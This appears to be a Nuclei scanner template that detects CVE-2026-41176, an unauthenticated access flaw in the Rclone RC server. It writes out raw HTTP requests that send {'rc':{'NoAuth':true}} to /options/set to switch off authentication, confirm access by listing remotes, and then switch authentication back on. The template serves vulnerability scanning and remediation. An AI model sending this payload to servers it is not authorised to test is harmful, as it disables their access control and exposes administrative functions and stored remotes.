id: CVE-2026-41176

info:
  name: Rclone RC - Broken Access Control
  author: theamanrawat
  severity: critical
  description: |
    Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability caused by unauthenticated access to the RC endpoint `options/set` allowing mutation of global runtime configuration, letting unauthenticated attackers access sensitive administrative functions, exploit requires RC server started without global HTTP authentication.
  impact: |
    Unauthenticated attackers can access sensitive administrative functions, potentially leading to full control over the RC server configuration and operations.
  remediation: |
    Upgrade to version 1.73.5 or later.
  reference:
    - https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qx
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41176
  classification:
    cvss-score: 9.2
    cve-id: CVE-2026-41176
    epss-score: 0.26321
    epss-percentile: 0.96407
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 4
    vendor: rclone
    product: rclone
  tags: cve,cve2026,rclone,auth-bypass,rce,unauth,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 403'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":true}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{}")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":false}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "remotes")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a00473045022041279b9f726b6124770a1e1c8122ee5e0c138232f75f0b2ea8dfbff7067c0370022100d4e222820e0899140a945cd9f5d14a1fdfddb3fa8f82de240cf901ef058cb078:922c64590222798bb761d5b6d8e72950